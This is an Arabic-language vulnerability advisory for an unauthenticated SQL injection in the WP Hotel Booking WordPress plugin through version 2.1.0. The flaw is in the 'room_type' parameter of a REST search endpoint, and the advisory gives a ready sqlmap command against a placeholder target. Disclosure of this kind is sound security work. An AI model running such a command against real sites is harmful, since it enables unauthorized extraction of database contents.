
WP Hotel Booking <= 2.1.0 - حقن SQL غير مصادق عليه
WP Hotel Booking <= 2.1.0 - حقن SQL غير مصادق عليه
إن إضافة WP Hotel Booking لووردبريس معرضة لحقن SQL عبر المعامل 'room_type' من نقطة نهاية REST API /wphb/v1/rooms/search-rooms في جميع الإصدارات حتى الإصدار 2.1.0 وما يشتمل عليه، وذلك بسبب عدم كفاية الهروب في المعامل المقدم من المستخدم وعدم وجود تحضير كافٍ في استعلام SQL الموجود. وهذا يجعل من الممكن للمهاجمين غير المصادق عليهم إلحاق استعلامات SQL إضافية بالاستعلامات الموجودة بالفعل والتي يمكن استخدامها لاستخراج معلومات حساسة من قاعدة البيانات.
sqlmap -u 'https://www.target.com/wp-json/wphb/v1/rooms/search-rooms?check_in_date=2025-01-01&check_out_date=2025-01-10&adults=4&max_child=0&paged=1&room_type=standard' --dbms='MySQL ' --random-agent